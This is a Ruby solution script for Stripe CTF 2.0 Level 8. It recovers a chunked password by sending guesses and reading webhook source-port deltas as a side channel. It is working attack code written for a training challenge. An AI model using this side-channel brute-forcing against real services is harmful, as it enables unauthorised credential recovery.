Stripe CTF 2.0 Level 8

webhook.rb

require 'json'
require 'net/http'
require 'socket'
require 'uri'

# first argument is the url for the passworddb server
uri = URI.parse ARGV.shift
$passdb = Net::HTTP.new uri.host, uri.port

# second argument is the local port for our webhook
$port = ARGV.shift
$server = TCPServer.new $port

# a global variable representing the password in 4 chunks
$chunks = [0,0,0,0]

# makes an http request to the passworddb server
# returns true if the password is correct
def guess password
  puts password
  response = $passdb.post '/', {
    password: password,
    webhooks: [ "localhost:#{$port}" ]
  }.to_json
  response.body =~ /true/
end

# blocks and returns the next source port seen by the web hook
def notice_source_port
  client = $server.accept
  source_port = client.peeraddr[1]
  client.close
  source_port
end

# returns a string representation of the password
def stringify_password
  $chunks.inject('') do |string, chunk|
    string + chunk.to_s.rjust(3, '0')
  end
end

# calibration step 1; need to establish baseline source port
guess stringify_password
first_port = notice_source_port

# calibration step 2; need to establish baseline delta
guess stringify_password
last_port = notice_source_port
last_delta = last_port - first_port

this_chunk = 0
verify = 3 # number of times to verify hits to prevent false positives
checks = verify

loop do
  password = stringify_password

  # make attempt
  if guess password
    puts "Yay! Password is #{password}"
    break
  end

  # observe source port of webhook; calulate delta
  source_port = notice_source_port
  this_delta = source_port - last_port
  last_port = source_port

  if this_delta > last_delta
    if this_delta - last_delta == 1
      checks -= 1
      redo if checks > 0
      checks = verify
      last_delta = this_delta
      this_chunk += 1
    end
  else
    $chunks[this_chunk] += 1
  end
end